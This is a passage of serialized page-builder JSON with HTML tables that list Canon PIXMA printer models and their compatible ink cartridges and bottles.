(Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment 